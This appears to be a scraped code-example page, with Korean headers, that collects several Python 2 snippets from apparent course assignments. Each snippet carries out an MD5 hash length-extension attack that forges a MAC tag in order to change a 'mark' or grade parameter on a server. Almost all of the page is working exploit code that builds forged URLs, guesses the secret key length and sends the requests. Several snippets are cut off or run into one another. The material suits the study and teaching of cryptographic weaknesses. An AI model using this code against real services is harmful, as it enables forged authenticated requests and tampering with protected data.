예제 #1
0
def attack(url, tag, sid, mark):

    extension = "&sid=" + sid + "&mark=" + mark

    # parameter url is the attack url you construct
    parsedURL = urlparse.urlparse(url)

    # open a connection to the server
    httpconn = httplib.HTTPConnection(parsedURL.hostname, parsedURL.port)

    h = md5(state=tag.decode("hex"), count=512)
    h.update(extension)

    for i in range(8, 21):

        sid2 = sid + urllib.quote(padding((len(sid) + 4 + i) * 8)) + extension

        query = parsedURL.path + "?tag=" + h.hexdigest() + "&sid=" + sid2

        # issue server-API request
        httpconn.request("GET", query)

        # httpresp is response object containing a status value and possible message
        httpresp = httpconn.getresponse()

        # valid request will result in httpresp.status value 200
        #        print httpresp.status
        httpresp.status

        # in the case of a valid request, print the server's message
        #        print httpresp.read()
        httpresp.read()

    # return the url that made the attack successful
    return (query)
예제 #2
0
def M(params):
    '''returns true/false whether Mallory sends the correct tag and params to the server'''
    # Mallory does not know the key
    # but she knows one specific tag, the one resulting from md5("secret" + "show me the grade")
    tag = "9f4bb32ac843d6db979ababa2949cb52"
    new_tag = md5(state=tag.decode("hex"), count=512)
    new_tag.update(padding(2 * 8))
    new_tag.update(" and change it to 100")
    return B(new_tag, params)
예제 #3
0
def forgeIllegalPayload(message, token, extension):
    '''
    In this function, you are not allowed to:
    - call the function createToken
    - use the secret key
    However, you might know the length of the secret key (6)
    '''
    h = md5(state=token.decode('hex'), count=512)
    h.update(extension)
    return h.hexdigest(), message + urllib.quote(
        padding((11 + len(message)) * 8)) + extension
예제 #4
0
def forgeIllegalPayload(message, token, extension):
    '''
    In this function, you are not allowed to:
    - call the function createToken
    - use the secret key
    However, you might know the length of the secret key (6)
    '''

    keyLen = 6

    h = md5(state=token.decode("hex"), count=512)

    h.update(extension)

    message2 = message + padding((len(message) + keyLen) * 8) + extension

    return h.hexdigest(), message2
예제 #5
0
hash_code = url.split('=')[1].split('&')[0]
# get the part with format "&utorid=..."
utorid_code = '&' + url.split('&')[1]
# get the student's utorid
utorid = utorid_code[1:].split('=')[1]

# get from d27 hash length-extension attack slides
# https://mathlab.utsc.utoronto.ca/courses/cscd27f16/handout/hash-extension.html
m = md5(state=hash_code.decode("hex"), count=512)
newmark = "&mark=" + mark + "&utorid=" + utorid
m.update(newmark)

# loop keylength in range(8, 17)
for i in range(8, 17):
    length = (len(utorid_code) + i) * 8
    pad = padding(length)

    # form the new url
    url = url_str + "?tag=" + m.hexdigest() + utorid_code + urllib.quote(
        pad) + newmark
    # parameter url is the attack url you construct
    parsedURL = urlparse.urlparse(url)

    # open a connection to the server
    httpconn = httplib.HTTPSConnection(parsedURL.hostname)

    # issue server-API request
    httpconn.request("GET", parsedURL.path + "?" + parsedURL.query)

    # httpresp is response object containing a status value and possible message
    httpresp = httpconn.getresponse()
query = myParsed.query
queryDict = dict(s.split("=") for s in query.split("&"))

#Update the hash with the marked query and new tag
h = md5(state=queryDict["tag"].decode("hex"), count=512)
markQuery = "&mark=" + str(mark)
h.update(markQuery)

# Store URL Params starting from the first '&' in a variable
URL_params = query[query.find("&"):]

# Compute the hash of new tag, marks and ith padding on each iteration
for i in range(8, 16+1):
    url = myParsed.scheme + "://" + myParsed.netloc  + \
    myParsed.path + "?tag=" + str(h.hexdigest()) + URL_params + \
    urllib.quote(padding((len(URL_params) + i)* 8)) + markQuery

    # parameter url is the attack url you construct 
    parsedURL = urlparse.urlparse(url)
    
    # open a connection to the server
    
    httpconn = httplib.HTTPSConnection(parsedURL.hostname)
    
    # issue server-API request
    httpconn.request("GET", parsedURL.path + "?" + parsedURL.query)
    
    # httpresp is response object containing a status value and possible message
    httpresp = httpconn.getresponse()
    # Only print request and server message when the server is working
    if httpresp.status == 200:
예제 #7
0
print("----------------------------------")

k = "secret"
m = "show me the grade"
m2 = "show me the grade and change it to 100"
a = md5(k + m)
b = md5(k + m2)
print "1---> " + a.hexdigest()
print "2---> " + b.hexdigest()
h = md5(state="9f4bb32ac843d6db979ababa2949cb52".decode("hex"), count=512)
print h.hexdigest()
x = " and change it to 100"
h.update(x)
print h.hexdigest()
print md5((k + m + padding(len(k + m) * 8)) + x).hexdigest()

print("----------------------------------")


def compute_magic_number(md5str):
    A = struct.unpack("I", md5str[0:8].decode('hex'))[0]
    B = struct.unpack("I", md5str[8:16].decode('hex'))[0]
    C = struct.unpack("I", md5str[16:24].decode('hex'))[0]
    D = struct.unpack("I", md5str[24:32].decode('hex'))[0]
    return A, B, C, D


print("----------------------------------")
a = md5()
a.state = compute_magic_number("9f4bb32ac843d6db979ababa2949cb52")
예제 #8
0
import httplib, urlparse, urllib, sys
from md5p import md5, padding, md5_compress

url = sys.argv[1]
mark = sys.argv[2]

tag = url[url.find("=") + 1:url.rfind("&")]
URL_param = url[url.find("&") + 1:]
msg = "&mark=" + str(mark)

# loop to try key length
for i in range(7, 17):
    l = i + len(URL_param)
    new_tag = md5(state=tag.decode("hex"), count=512)

    new_tag.state = md5_compress(new_tag.state, msg + padding(l + len(padding(l * 8)) + len(msg)) + msg)

    url = url[:url.find("=") + 1] + new_tag.hexdigest() + msg

    # parameter url is the attack url you construct
    parsedURL = urlparse.urlparse(url)

    # open a connection to the server
    httpconn = httplib.HTTPSConnection(parsedURL.hostname)

    # issue server-API request
    httpconn.request("GET", parsedURL.path + "?" + parsedURL.query)

    # httpresp is response object containing a status value and possible message
    httpresp = httpconn.getresponse()
예제 #9
0
httpconn = httplib.HTTPSConnection(parsedURL.hostname)

# get the hash value
tag = params[0][4:]
# get the new hash value by setting internal state to the previous hash value
h = md5(state=tag.decode("hex"), count=512)
mark = "&mark=" + mark_value
h.update(mark)
new_tag =  h.hexdigest()

# loop through all possible key lengths from 8 to 16
for key_len in range(8, 17):
   # expected length of paddings to fill 512 bits
   # (by subtracting the length of existing key and previous query from 512)
   length = 512 - len(query)*8 - key_len*8
   
   update_query = "tag=" + str(new_tag) + "&" + query + urllib.quote(padding(length)) + mark

   # issue server-API request
   httpconn.request("GET", parsedURL.path + "?" + update_query)
   
   # httpresp is response object containing a status value and possible message
   httpresp = httpconn.getresponse()
   
   # valid request will result in httpresp.status value 200
   if httpresp.status == 200:
      print httpresp.status
      # in the case of a valid request, print the server's message
      print httpresp.read()